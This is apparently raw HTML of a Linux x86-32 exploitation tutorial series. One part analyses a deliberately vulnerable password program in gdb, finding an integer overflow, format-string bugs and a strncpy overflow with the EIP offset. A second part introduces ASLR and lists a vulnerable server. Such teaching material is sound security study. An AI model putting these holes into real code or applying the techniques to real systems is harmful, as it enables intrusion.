class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"strncpy/spanspan class="p"(/spanspan class="n"p/spanspan class="p",/spanspan class="w" /spanspan class="n"a/spanspan class="p",/spanspan class="w" /spanspan class="n"strlen/spanspan class="p"(/spanspan class="n"a/spanspan class="p")/spanspan class="o"+/spanspan class="mi"1/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"r/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"strcmp/spanspan class="p"(/spanspan class="n"p/spanspan class="p",/spanspan class="w" /spanspan class="n"PASS/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"return/spanspan class="w" /spanspan class="n"r/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="p"}/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="kt"void/spanspan class="w" /spanspan class="nf"printfile/spanspan class="p"()/spanspan class="w"/span/span span class="code-line"span class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"FILE/spanspan class="w" /spanspan class="o"*/spanspan class="n"f/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"c/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"f/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"fopen/spanspan class="p"(/spanspan class="n"SFILE/spanspan class="p",/spanspan class="w" /spanspan class="s"quot;rquot;/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"if/spanspan class="w" /spanspan class="p"(/spanspan class="n"f/spanspan class="p")/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"while/spanspan class="w" /spanspan class="p"((/spanspan class="n"c/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"getc/spanspan class="p"(/spanspan class="n"f/spanspan class="p"))/spanspan class="w" /spanspan class="o"!=/spanspan class="w" /spanspan class="n"EOF/spanspan class="p")/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"putchar/spanspan class="p"(/spanspan class="n"c/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"fclose/spanspan class="p"(/spanspan class="n"f/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="p"}/spanspan class="w" /spanspan class="k"else/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printf/spanspan class="p"(/spanspan class="s"quot;Error opening file: quot;/spanspan class="w" /spanspan class="n"SFILE/spanspan class="w" /spanspan class="s"quot;/spanspan class="se"\n/spanspan class="s"quot;/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"exit/spanspan class="p"(/spanspan class="mi"1/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="p"}/spanspan class="w"/span/span span class="code-line"span class="p"}/spanspan class="w"/span/span span class="code-line"/code/pre/div /td/tr/table pHere is the quick demonstration:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/span span class="code-line"span class="normal"4/span/span span class="code-line"span class="normal"5/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"root@dev:/home/testuser# /spangcc -z execstack -fno-stack-protector -o app-intof app-intof.c /span span class="code-line"span class="gp"root@dev:/home/testuser# ./app-intof $/spanspan class="o"(/spanpython -c span class="s1"#39;print quot;A quot;*126#39;/spanspan class="o")/span/span span class="code-line"span class="go"Wrong password: A/span/span span class="code-line"span class="gp"root@dev:/home/testuser# ./app-intof $/spanspan class="o"(/spanpython -c span class="s1"#39;print quot;A quot;*127#39;/spanspan class="o")/span/span span class="code-line"span class="go"Usage: ./app-intof lt;passwordgt;/span/span span class="code-line"/code/pre/div /td/tr/table pWhat is happening here is that the argument codeargc/code is being interpreted as a signed char and the max value for this type of variable is 127:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"root@dev:/home/testuser# /spangrep SCHAR_MAX /usr/include/limits.h /span span class="code-line"span class="gp"# /spandefine SCHAR_MAX span class="m"127/span/span span class="code-line"span class="gp"# /spandefine CHAR_MAX SCHAR_MAX/span span class="code-line"/code/pre/div /td/tr/table pAs the application is the first argument, we can have another 126 argument before the variable overflows and becomes -128, which is obviously smaller than 2./p h2Back To The Juicy Bits/h2 pSo now we know how to get to the code we want to analyse, which is:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/span span class="code-line"span class="normal"4/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="x" 0x08048627 lt;+27gt;: mov eax,DWORD PTR [ebp+0xc]/span/span span class="code-line"span class="x" 0x0804862a lt;+30gt;: mov eax,DWORD PTR [eax]/span/span span class="code-line"span class="x" 0x0804862c lt;+32gt;: mov DWORD PTR [esp],eax/span/span span class="code-line"span class="x" 0x0804862f lt;+35gt;: call 0x8048470 lt;printf@pltgt;/span/span span class="code-line"/code/pre/div /td/tr/table pLet's set a breakpoint on line 1 here (or code0x08048627/code) and run the application without any arguments./p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp gp-VirtualEnv"(gdb)/span span class="go"break *0x08048627/span/span span class="code-line"span class="go"Breakpoint 1 at 0x8048627/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"r/span/span span class="code-line"span class="go"Starting program: /home/testuser/app /span/span span class="code-line"/span span class="code-line"span class="go"Breakpoint 1, 0x08048627 in main ()/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"disassemble $eip,+10/span/span span class="code-line"span class="go"Dump of assembler code from 0x8048627 to 0x8048631:/span/span span class="code-line"span class="go"=gt; 0x08048627 lt;main+27gt;: mov eax,DWORD PTR [ebp+0xc]/span/span span class="code-line"span class="go" 0x0804862a lt;main+30gt;: mov eax,DWORD PTR [eax]/span/span span class="code-line"span class="go" 0x0804862c lt;main+32gt;: mov DWORD PTR [esp],eax/span/span span class="code-line"span class="go" 0x0804862f lt;main+35gt;: call 0x8048470 lt;printf@pltgt;/span/span span class="code-line"span class="go"End of assembler dump./span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"x/xw $ebp+0xc/span/span span class="code-line"span class="go"0xbfc674f4: 0xbfc67594/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"x/xw 0xbfc67594/span/span span class="code-line"span class="go"0xbfc67594: 0xbfc6795f/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"x/s 0xbfc6795f/span/span span class="code-line"span class="go"0xbfc6795f: quot;/home/testuser/appquot;/span/span span class="code-line"/code/pre/div /td/tr/table pThis shows that our assumptions were correct and that there is likely a format string vulnerability here which we can exploit by chaning the name of the application (or creating a symlink as in a href="/x86-32-linux/2014/05/20/plain-format-string-vulnerability/"part 2/a./p pWe also have a very similar set of codeprintf/code calls towards the end of the application:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/span span class="code-line"span class="normal"4/span/span span class="code-line"span class="normal"5/span/span span class="code-line"span class="normal"6/span/span span class="code-line"span class="normal"7/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="x" 0x08048667 lt;+91gt;: mov DWORD PTR [esp],0x8048804/span/span span class="code-line"span class="x" 0x0804866e lt;+98gt;: call 0x8048470 lt;printf@pltgt;/span/span span class="code-line"span class="x" 0x08048673 lt;+103gt;: mov eax,DWORD PTR [ebp+0xc]/span/span span class="code-line"span class="x" 0x08048676 lt;+106gt;: add eax,0x4/span/span span class="code-line"span class="x" 0x08048679 lt;+109gt;: mov eax,DWORD PTR [eax]/span/span span class="code-line"span class="x" 0x0804867b lt;+111gt;: mov DWORD PTR [esp],eax/span/span span class="code-line"span class="x" 0x0804867e lt;+114gt;: call 0x8048470 lt;printf@pltgt;/span/span span class="code-line"/code/pre/div /td/tr/table pWe are interested in the second codeprintf/code here but to figure out how to get to it we need to have a look at the memory at code0x8048804/code which is printed just before./p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp gp-VirtualEnv"(gdb)/span span class="go"x/s 0x8048804/span/span span class="code-line"span class="go"0x8048804: quot;Wrong password: quot;/span/span span class="code-line"/code/pre/div /td/tr/table pSo we get to this section of code when we give a wrong password. The call to the codeprintf/code in question is the same as previous except 4 is added to EAX before the pointer is followed. This suggests the second argument is being printed (also the previous codeprintf/code supports our theory), but let's check./p pLet's set a breakpoint and examine the memory again:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp gp-VirtualEnv"(gdb)/span span class="go"info breakpoints/span/span span class="code-line"span class="go"Num Type Disp Enb Address What/span/span span class="code-line"span class="go"1 breakpoint keep y 0x08048627 lt;main+27gt;/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"delete 1/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"break *0x0804867b/span/span span class="code-line"span class="go"Breakpoint 2 at 0x804867b/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"r ABC/span/span span class="code-line"span class="go"Starting program: /home/testuser/app ABC/span/span span class="code-line"/span span class="code-line"span class="go"Breakpoint 2, 0x0804867b in main ()/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"x/s $eax/span/span span class="code-line"span class="go"0xbffff96d: quot;ABCquot;/span/span span class="code-line"/code/pre/div /td/tr/table pThis is the second format string vulnerability./p h2Buffer Overflow/h2 pSo far we have found an integer overflow and 2 format string vulnerabilities./p pNext we should look over the codecheckpass/code function which is called on line 23 of the disassembly above. Here is the relevant instructions related to the call to codecheckpass/code:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/span span class="code-line"span class="normal"4/span/span span class="code-line"span class="normal"5/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="x" 0x0804864c lt;+64gt;: mov eax,DWORD PTR [ebp+0xc]/span/span span class="code-line"span class="x" 0x0804864f lt;+67gt;: add eax,0x4/span/span span class="code-line"span class="x" 0x08048652 lt;+70gt;: mov eax,DWORD PTR [eax]/span/span span class="code-line"span class="x" 0x08048654 lt;+72gt;: mov DWORD PTR [esp],eax/span/span span class="code-line"span class="x" 0x08048657 lt;+75gt;: call 0x80486a2 lt;checkpassgt;/span/span span class="code-line"/code/pre/div /td/tr/table pWe've already seen a set of instructions that were exactly the same as this, the second call to codeprintf/code, so this function takes 1 argument, the second argument to the application./p pHere is the disassembly of codecheckpass/code:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/span span class="code-line"span class="normal"20/span/span span class="code-line"span class="normal"21/span/span span class="code-line"span class="normal"22/span/span span class="code-line"span class="normal"23/span/span span class="code-line"span class="normal"24/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp gp-VirtualEnv"(gdb)/span span class="go"disassemble checkpass/span/span span class="code-line"span class="go"Dump of assembler code for function checkpass:/span/span span class="code-line"span class="go" 0x080486a2 lt;+0gt;: push ebp/span/span span class="code-line"span class="go" 0x080486a3 lt;+1gt;: mov ebp,esp/span/span span class="code-line"span class="go" 0x080486a5 lt;+3gt;: sub esp,0x228/span/span span class="code-line"span class="go" 0x080486ab lt;+9gt;: mov eax,DWORD PTR [ebp+0x8]/span/span span class="code-line"span class="go" 0x080486ae lt;+12gt;: mov DWORD PTR [esp],eax/span/span span class="code-line"span class="go" 0x080486b1 lt;+15gt;: call 0x80484d0 lt;strlen@pltgt;/span/span span class="code-line"span class="go" 0x080486b6 lt;+20gt;: add eax,0x1/span/span span class="code-line"span class="go" 0x080486b9 lt;+23gt;: mov DWORD PTR [esp+0x8],eax/span/span span class="code-line"span class="go" 0x080486bd lt;+27gt;: mov eax,DWORD PTR [ebp+0x8]/span/span span class="code-line"span class="go" 0x080486c0 lt;+30gt;: mov DWORD PTR [esp+0x4],eax/span/span span class="code-line"span class="go" 0x080486c4 lt;+34gt;: lea eax,[ebp-0x20c]/span/span span class="code-line"span class="go" 0x080486ca lt;+40gt;: mov DWORD PTR [esp],eax/span/span span class="code-line"span class="go" 0x080486cd lt;+43gt;: call 0x8048510 lt;strncpy@pltgt;/span/span span class="code-line"span class="go" 0x080486d2 lt;+48gt;: mov DWORD PTR [esp+0x4],0x8048815/span/span span class="code-line"span class="go" 0x080486da lt;+56gt;: lea eax,[ebp-0x20c]/span/span span class="code-line"span class="go" 0x080486e0 lt;+62gt;: mov DWORD PTR [esp],eax/span/span span class="code-line"span class="go" 0x080486e3 lt;+65gt;: call 0x8048460 lt;strcmp@pltgt;/span/span span class="code-line"span class="go" 0x080486e8 lt;+70gt;: mov DWORD PTR [ebp-0xc],eax/span/span span class="code-line"span class="go" 0x080486eb lt;+73gt;: mov eax,DWORD PTR [ebp-0xc]/span/span span class="code-line"span class="go" 0x080486ee lt;+76gt;: leave /span/span span class="code-line"span class="go" 0x080486ef lt;+77gt;: ret /span/span span class="code-line"span class="go"End of assembler dump./span/span span class="code-line"/code/pre/div /td/tr/table pIn the prologue, 0x228 bytes (or 552 bytes) are reserved for local variables and function call arguments./p pThe interesting call here is the call to codestrncpy/code but we need to examine the call to codestrlen/code first because it looks like output is the third argument to codestrncpy/code./p pThe call to codestrlen/code:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="x" 0x080486ab lt;+9gt;: mov eax,DWORD PTR [ebp+0x8]/span/span span class="code-line"span class="x" 0x080486ae lt;+12gt;: mov DWORD PTR [esp],eax/span/span span class="code-line"span class="x" 0x080486b1 lt;+15gt;: call 0x80484d0 lt;strlen@pltgt;/span/span span class="code-line"/code/pre/div /td/tr/table pIt's clear the first argument is being used as the argument to codestrlen/code. Return values are normally passed using the EAX register./p pHere is the call to codestrncpy/code:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/span span class="code-line"span class="normal"4/span/span span class="code-line"span class="normal"5/span/span span class="code-line"span class="normal"6/span/span span class="code-line"span class="normal"7/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="x" 0x080486b6 lt;+20gt;: add eax,0x1/span/span span class="code-line"span class="x" 0x080486b9 lt;+23gt;: mov DWORD PTR [esp+0x8],eax/span/span span class="code-line"span class="x" 0x080486bd lt;+27gt;: mov eax,DWORD PTR [ebp+0x8]/span/span span class="code-line"span class="x" 0x080486c0 lt;+30gt;: mov DWORD PTR [esp+0x4],eax/span/span span class="code-line"span class="x" 0x080486c4 lt;+34gt;: lea eax,[ebp-0x20c]/span/span span class="code-line"span class="x" 0x080486ca lt;+40gt;: mov DWORD PTR [esp],eax/span/span span class="code-line"span class="x" 0x080486cd lt;+43gt;: call 0x8048510 lt;strncpy@pltgt;/span/span span class="code-line"/code/pre/div /td/tr/table pYou can see that 1 is added to the return value and it is put on the stack as the third argument to codestrncpy/code./p pThe pointer to the function argument is then put on the stack as the second argument (on line 3 and 4)./p pLastly the address of the local variable is then put on the stack as the first argument (on lines 5 and 6)./p pHere we can see that the local variable is 0x20c bytes (524 bytes) away from EBP, meaning that we'll need to write 528 bytes until we overwrite EIP using an overflow here, 4 bytes are added for the old EBP saved during the prologue./p pLooking at the prototype for codestrncpy/code (using codeman strncpy/code), we can see that the first argument is the destination, second the source and third the maximum characters to copy:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="go" char *strncpy(char *dest, const char *src, size_t n);/span/span span class="code-line"/code/pre/div /td/tr/table pKnowing all of this, its easy to see that there is in fact a buffer overflow here because the developer has used the length of the input buffer to bound the copy function. We can even see how many bytes we have until we overwrite EIP./p h2Conclusion/h2 pWhile its technically possible to just fuzz all of the application inputs, the more complex the application gets the more infeasible it becomes./p pThis is also true for reverse engineering every section of an application so its important that you know how to focus on the important parts of the application./p pUltimately reverse engineering is much more powerful than fuzzing but both should be used in combination to increase efficiency./p pHappy Hacking :-)/p

pHere we are going to start with the first protection I want to look at which is a href="https://en.wikipedia.org/wiki/Address_space_layout_randomization" target="_blank"address space layout randomization (ASLR)/a./p pIn parts a href="/x86-32-linux/2014/05/08/plain-buffer-overflow/"1/a, a href="/x86-32-linux/2014/05/20/plain-format-string-vulnerability/"2/a, a href="/x86-32-linux/2014/06/12/remote-exploitation/"3/a and a href="/x86-32-linux/reverse-engineering/2014/07/01/basic-binary-auditing/"4/a ASLR had been disabled./p pASLR basically randomizes the a href="https://en.wikipedia.org/wiki/Virtual_address_space" target="_blank"virtual address space/a of all userland applications and in more modern OSs, kernel space too./p !-- more -- pBefore ASLR, the virtual address space of an application was completely static, meaning that everything will always be at the same memory address each time the application is run./p pIn parts 1, 2 and 3 we've taken advantage of this by being able to predict the address that our a href="https://en.wikipedia.org/wiki/Shellcode" target="_blank"shellcode/a./p pThis protection is slightly newer in the Linux kernel than a href="https://en.wikipedia.org/wiki/NX_bit" target="_blank"NX/a, as it was first implemented in 2005 but it will introduce us to an idea which we will use much more extensively to beat NX./p h2The App/h2 pThe application below is almost the same as the 1 in part a href="/x86-32-linux/2014/06/12/remote-exploitation/"3/a of this series:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal" 10/span/span span class="code-line"span class="normal" 11/span/span span class="code-line"span class="normal" 12/span/span span class="code-line"span class="normal" 13/span/span span class="code-line"span class="normal" 14/span/span span class="code-line"span class="normal" 15/span/span span class="code-line"span class="normal" 16/span/span span class="code-line"span class="normal" 17/span/span span class="code-line"span class="normal" 18/span/span span class="code-line"span class="normal" 19/span/span span class="code-line"span class="normal" 20/span/span span class="code-line"span class="normal" 21/span/span span class="code-line"span class="normal" 22/span/span span class="code-line"span class="normal" 23/span/span span class="code-line"span class="normal" 24/span/span span class="code-line"span class="normal" 25/span/span span class="code-line"span class="normal" 26/span/span span class="code-line"span class="normal" 27/span/span span class="code-line"span class="normal" 28/span/span span class="code-line"span class="normal" 29/span/span span class="code-line"span class="normal" 30/span/span span class="code-line"span class="normal" 31/span/span span class="code-line"span class="normal" 32/span/span span class="code-line"span class="normal" 33/span/span span class="code-line"span class="normal" 34/span/span span class="code-line"span class="normal" 35/span/span span class="code-line"span class="normal" 36/span/span span class="code-line"span class="normal" 37/span/span span class="code-line"span class="normal" 38/span/span span class="code-line"span class="normal" 39/span/span span class="code-line"span class="normal" 40/span/span span class="code-line"span class="normal" 41/span/span span class="code-line"span class="normal" 42/span/span span class="code-line"span class="normal" 43/span/span span class="code-line"span class="normal" 44/span/span span class="code-line"span class="normal" 45/span/span span class="code-line"span class="normal" 46/span/span span class="code-line"span class="normal" 47/span/span span class="code-line"span class="normal" 48/span/span span class="code-line"span class="normal" 49/span/span span class="code-line"span class="normal" 50/span/span span class="code-line"span class="normal" 51/span/span span class="code-line"span class="normal" 52/span/span span class="code-line"span class="normal" 53/span/span span class="code-line"span class="normal" 54/span/span span class="code-line"span class="normal" 55/span/span span class="code-line"span class="normal" 56/span/span span class="code-line"span class="normal" 57/span/span span class="code-line"span class="normal" 58/span/span span class="code-line"span class="normal" 59/span/span span class="code-line"span class="normal" 60/span/span span class="code-line"span class="normal" 61/span/span span class="code-line"span class="normal" 62/span/span span class="code-line"span class="normal" 63/span/span span class="code-line"span class="normal" 64/span/span span class="code-line"span class="normal" 65/span/span span class="code-line"span class="normal" 66/span/span span class="code-line"span class="normal" 67/span/span span class="code-line"span class="normal" 68/span/span span class="code-line"span class="normal" 69/span/span span class="code-line"span class="normal" 70/span/span span class="code-line"span class="normal" 71/span/span span class="code-line"span class="normal" 72/span/span span class="code-line"span class="normal" 73/span/span span class="code-line"span class="normal" 74/span/span span class="code-line"span class="normal" 75/span/span span class="code-line"span class="normal" 76/span/span span class="code-line"span class="normal" 77/span/span span class="code-line"span class="normal" 78/span/span span class="code-line"span class="normal" 79/span/span span class="code-line"span class="normal" 80/span/span span class="code-line"span class="normal" 81/span/span span class="code-line"span class="normal" 82/span/span span class="code-line"span class="normal" 83/span/span span class="code-line"span class="normal" 84/span/span span class="code-line"span class="normal" 85/span/span span class="code-line"span class="normal" 86/span/span span class="code-line"span class="normal" 87/span/span span class="code-line"span class="normal" 88/span/span span class="code-line"span class="normal" 89/span/span span class="code-line"span class="normal" 90/span/span span class="code-line"span class="normal" 91/span/span span class="code-line"span class="normal" 92/span/span span class="code-line"span class="normal" 93/span/span span class="code-line"span class="normal" 94/span/span span class="code-line"span class="normal" 95/span/span span class="code-line"span class="normal" 96/span/span span class="code-line"span class="normal" 97/span/span span class="code-line"span class="normal" 98/span/span span class="code-line"span class="normal" 99/span/span span class="code-line"span class="normal"100/span/span span class="code-line"span class="normal"101/span/span span class="code-line"span class="normal"102/span/span span class="code-line"span class="normal"103/span/span span class="code-line"span class="normal"104/span/span span class="code-line"span class="normal"105/span/span span class="code-line"span class="normal"106/span/span span class="code-line"span class="normal"107/span/span span class="code-line"span class="normal"108/span/span span class="code-line"span class="normal"109/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;sys/socket.hgt;/spanspan class="cp"/span/span span class="code-line"span class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;netinet/in.hgt;/spanspan class="cp"/span/span span class="code-line"span class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;stdio.hgt;/spanspan class="cp"/span/span span class="code-line"span class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;strings.hgt;/spanspan class="cp"/span/span span class="code-line"span class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;stdlib.hgt;/spanspan class="cp"/span/span span class="code-line"span class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;string.hgt;/spanspan class="cp"/span/span span class="code-line"/span span class="code-line"span class="cp"#define PASS quot;topsecretpasswordquot;/span/span span class="code-line"span class="cp"#define CNUM 58623/span/span span class="code-line"span class="cp"#define SFILE quot;secret.txtquot;/span/span span class="code-line"span class="cp"#define TFILE quot;tokenquot;/span/span span class="code-line"span class="cp"#define PORT 9999/span/span span class="code-line"/span span class="code-line"span class="kt"void/spanspan class="w" /spanspan class="nf"sendfile/spanspan class="p"(/spanspan class="kt"int/spanspan class="w" /spanspan class="n"connfd/spanspan class="p",/spanspan class="w" /spanspan class="k"struct/spanspan class="w" /spanspan class="nc"sockaddr_in/spanspan class="w" /spanspan class="n"cliaddr/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="kt"void/spanspan class="w" /spanspan class="nf"senderror/spanspan class="p"(/spanspan class="kt"int/spanspan class="w" /spanspan class="n"connfd/spanspan class="p",/spanspan class="w" /spanspan class="k"struct/spanspan class="w" /spanspan class="nc"sockaddr_in/spanspan class="w" /spanspan class="n"cliaddr/spanspan class="p",/spanspan class="w" /spanspan class="kt"char/spanspan class="w" /spanspan class="n"p/spanspan class="p"[]);/spanspan class="w"/span/span span class="code-line"span class="kt"void/spanspan class="w" /spanspan class="nf"sendtoken/spanspan class="p"(/spanspan class="kt"int/spanspan class="w" /spanspan class="n"connfd/spanspan class="p",/spanspan class="w" /spanspan class="k"struct/spanspan class="w" /spanspan class="nc"sockaddr_in/spanspan class="w" /spanspan class="n"cliaddr/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="kt"int/spanspan class="w" /spanspan class="nf"checkpass/spanspan class="p"(/spanspan class="kt"char/spanspan class="w" /spanspan class="o"*/spanspan class="n"p/spanspan class="p");/spanspan class="w"/span/span span class="code-line"/span span class="code-line"/span span class="code-line"span class="kt"void/spanspan class="w" /spanspan class="nf"main/spanspan class="p"()/spanspan class="w"/span/span span class="code-line"span class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"listenfd/spanspan class="p",/spanspan class="w" /spanspan class="n"connfd/spanspan class="p",/spanspan class="w" /spanspan class="n"n/spanspan class="p",/spanspan class="w" /spanspan class="n"c/spanspan class="p",/spanspan class="w" /spanspan class="n"r/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"struct/spanspan class="w" /spanspan class="nc"sockaddr_in/spanspan class="w" /spanspan class="n"servaddr/spanspan class="p",/spanspan class="w" /spanspan class="n"cliaddr/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"socklen_t/spanspan class="w" /spanspan class="n"clilen/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"pid_t/spanspan class="w" /spanspan class="n"childpid/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"char/spanspan class="w" /spanspan class="n"pwd/spanspan class="p"[/spanspan class="mi"1000/spanspan class="p"];/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="n"listenfd/spanspan class="o"=/spanspan class="n"socket/spanspan class="p"(/spanspan class="n"AF_INET/spanspan class="p",/spanspan class="n"SOCK_STREAM/spanspan class="p",/spanspan class="mi"0/spanspan class="p");/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="n"bzero/spanspan class="p"(/spanspan class="o"amp;/spanspan class="n"servaddr/spanspan class="p",/spanspan class="k"sizeof/spanspan class="p"(/spanspan class="n"servaddr/spanspan class="p"));/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"servaddr/spanspan class="p"./spanspan class="n"sin_family/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"AF_INET/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"servaddr/spanspan class="p"./spanspan class="n"sin_addr/spanspan class="p"./spanspan class="n"s_addr/spanspan class="o"=/spanspan class="n"htonl/spanspan class="p"(/spanspan class="n"INADDR_ANY/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"servaddr/spanspan class="p"./spanspan class="n"sin_port/spanspan class="o"=/spanspan class="n"htons/spanspan class="p"(/spanspan class="n"PORT/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"if/spanspan class="w" /spanspan class="p"((/spanspan class="n"r/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"bind/spanspan class="p"(/spanspan class="n"listenfd/spanspan class="p",(/spanspan class="k"struct/spanspan class="w" /spanspan class="nc"sockaddr/spanspan class="w" /spanspan 